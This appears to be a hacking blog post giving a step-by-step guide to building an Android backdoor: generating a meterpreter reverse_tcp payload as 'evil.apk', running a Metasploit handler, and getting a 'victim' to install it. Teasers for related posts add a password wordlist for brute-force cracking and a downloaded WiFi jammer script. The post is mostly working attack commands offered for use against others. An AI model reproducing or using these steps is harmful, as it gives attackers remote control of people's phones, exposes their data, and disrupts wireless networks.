Skip to main content

HACKING ANDROID WITH KALI LINUX

THINGS WE NEED :-
1)KALI LINUX {OR} BACKTRACK
2)METERPRETER

NOW LETS GET STARTED ...............

PROCEDURE :-
1) Open a terminal and type:
msfconsole
2) now open an another terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST=your ip address  LPORT=81 R > evil.apk









note:- this file evil.apk is an backdoor virus file it should be implanted in the victim's android phone



3) now, get back to the first terminal witch has msfconsole running in it
and type :::
msf > use multi/handler


4)then type:
msf > exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp

5)now type
msf  exploit(handler) > set LHOST your ip address
 and
msf exploit(handler) >  set LPORT 81
then type
msf exploit(handler) > exploit










location:-
places===>home folder====>evil.apk


when you hit enter after typing exploit you will see like this
[*] started reverse handler on your ip address
[*] started the payload handler...

now the you have to make sure that the victim should click the file(evil.apk)

when you will sucessefully hack into it you will see
meterpreter >



to get meterpreter best commnads go to
http://letsgohackers.blogspot.in/2014/05/best-meterpreter-commands.html


Comments

Popular posts from this blog

DOWNLOAD AN WORD-LIST OF 1.1 MILLION WORD'S

WORDLIST :- WORLISTS IS AN FILE WHICH CONTAINS ALL POSSIBILITY OF WORD'S. THESE ARE USED FOR HACKING LIKE :-AIRCRACK -NG ,HACKING WINDOWS ,BURTE FORCE ATTACK HERE IS THE WORDLIST WHICH I HAVE CREATED OF 1.1MILLION WORD'S DOWNLOAD LINK :- https://mega.co.nz/#!twQQkYAT!FwK-s5QcHXZrr2VC8eEFLCLWqE0t8gR_qMs1wuqgZAQ                                                                                   THANK YOU

HOW TO PATCH XBOX 360 GAMES USING ABGX360 AND PLAY (NO MOD CHIPPING)

THINGS WE NEED :- 1)XBOX 360 2)ABGX360 ( PATCHING SOFTWARE) 3)IMGBURN(TO WRITE IMAGE FILE TO DISC) 4) XBOX 360 GAME ISO FILE 5)DUAL LAYER DVD'S (THESE ARE THE ONCE WHICH XBOX CAN READ) TO DOWNLOAD THE ABOVE SOFTWARE'S GO TO ~ABGX360---> http://abgx360.net/download.php ~IMGBURN---> http://imgburn.com/index.php?act=download TO DUAL LAYER DVD'sGO TO INDIA--> http://www.flipkart.com/verbatim-dvd-r-dl-8-5gb-10-pack-spindle/p/itmczzcanjdg7vgv?pid=ACCCZZC9QQZEJSUV&otracker=from-search&srno=t_1&query=8gb+dvd&ref=6c0a22ab-dbdb-4e3b-8d23-99adaa918f5c USA--> http://www.amazon.com/Verbatim-Double-Recordable-3-Disc-95014/dp/B0002LEMWE NOTE:- THIS WILL ONLY WORK FOR COMPUTER'S WHICH CAN BURN OR READ DUAL LAYER DVD'S ONLY TO CHECK THAT YOU CAN DOWNLOAD NERO INFO TOOL HERE IS THE LINK--> http://www.nero.com/enu/support-nero8-tools-utilities.html NOW LET'S GET STARTED....... HERE THE MAIN THING YOU  NEED IS THE GAME ISO FIL...

WIFI JAMMER (BACKTRACK OR KALI LINUX)

things you need:  1) backtrack 5 (or) kali linux 2) wireless router (inorder to get wifi networks) now,lets get started................... PROCESS: Commands Used: Open a Terminal and type in: wget http://wifijammer.googlecode.com/files/wifijammer_0.1.sh Then type: chmod +x wifijammer_0.1.sh Then type: ./wifijammer_0.1.sh wlan0 Then type: scan Let it find all the networks.... When asked for the channel type in the channel of the wireless network. When you wanna stop the WiFi Jammer Press CTRL+C on the Terminals.